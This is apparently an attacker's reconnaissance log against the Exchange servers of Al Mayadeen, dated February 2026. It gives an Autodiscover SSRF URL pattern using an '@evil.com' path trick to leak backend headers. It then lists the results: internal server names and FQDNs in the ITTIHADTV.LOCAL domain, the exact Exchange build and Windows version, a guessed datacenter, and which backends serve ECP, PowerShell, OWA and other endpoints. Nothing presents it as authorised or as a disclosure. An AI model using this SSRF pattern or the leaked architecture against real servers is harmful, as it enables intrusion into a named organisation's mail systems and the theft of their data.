Exchange Backend Server Enumeration — Al Mayadeen (autodiscover.almayadeen.net)
================================================================================

Method: Autodiscover JSON SSRF path leaking X-BEServer, X-CalculatedBETarget, X-DiagInfo headers
URL Pattern: /autodiscover/autodiscover.json?@evil.com/{service}/?&Email=autodiscover/autodiscover.json%3F@evil.com

CONFIRMED SERVERS (6 total):
=============================

Frontend (Internet-facing CAS):
  BHS-EX09 — X-FEServer header on all responses
    FQDN:  BHS-EX09.ITTIHADTV.LOCAL
    Build: 15.1.2507.59 (Exchange 2016 CU23 Sep25HU)
    OS:    Windows Server 2012 R2 (IIS 8.5)
    Role:  Client Access Server (public-facing)

Backend Servers (load-balanced round-robin):
  BHS-EX01 — Seen via: EWS, MAPI/EMSMDB
  BHS-EX02 — Seen via: MAPI/NSPI, ECP, PowerShell, RPC, ActiveSync
  BHS-EX03 — Seen via: OAB, OWA, EWS, MAPI/NSPI, RPC, ECP, ActiveSync
  BHS-EX04 — Seen via: EWS, MAPI/NSPI, OAB, RPC, MAPI/EMSMDB, PowerShell, OWA
  BHS-EX05 — Seen via: ActiveSync, MAPI/EMSMDB, ECP, Federation (port 444)
    FQDN: bhs-ex05.ittihadtv.local (from federation metadata)

MISSING SERVERS (possibly decommissioned):
  BHS-EX06 — NOT SEEN in 20+ rounds
  BHS-EX07 — NOT SEEN in 20+ rounds
  BHS-EX08 — NOT SEEN in 20+ rounds

Architecture Analysis:
  - 5 backend mailbox servers in Database Availability Group (DAG)
  - 1 frontend Client Access Server (BHS-EX09)
  - All in ITTIHADTV.LOCAL Active Directory domain
  - BHS prefix suggests OVH Beauharnois (Quebec, Canada) datacenter
  - Load balancing is round-robin across all 5 backends
  - Servers 06-08 either decommissioned or in separate DAG/role

Service Mapping (from SSRF responses):
  /ews/exchange.asmx           — All backends (EX01-EX05)
  /mapi/nspi                   — All backends (Address Book/GAL)
  /mapi/emsmdb                 — All backends (MAPI connections)
  /oab                         — All backends (Offline Address Book)
  /rpc/rpcproxy.dll            — All backends (Outlook Anywhere)
  /ecp                         — All backends (Admin panel)
  /owa                         — All backends (Webmail)
  /powershell                  — All backends (Remote management)
  /Microsoft-Server-ActiveSync — All backends (Mobile sync)

Additional Headers Leaked:
  X-CalculatedBETarget: bhs-exNN.ittihadtv.local (full FQDN)
  X-DiagInfo: BHS-EXNN (NetBIOS name)
  X-BEServer: BHS-EXNN (backend server name)
  X-FEServer: BHS-EX09 (frontend server, constant)
  X-OWA-Version: 15.1.2507.59 (on all responses)
  X-WSSecurity-Enabled: True (on MRS Proxy)
  X-OAuth-Enabled: True (on MRS Proxy)

Enumeration Date: Feb 28, 2026
Rounds: 20+ (confirmed only EX01-EX05 in backend pool)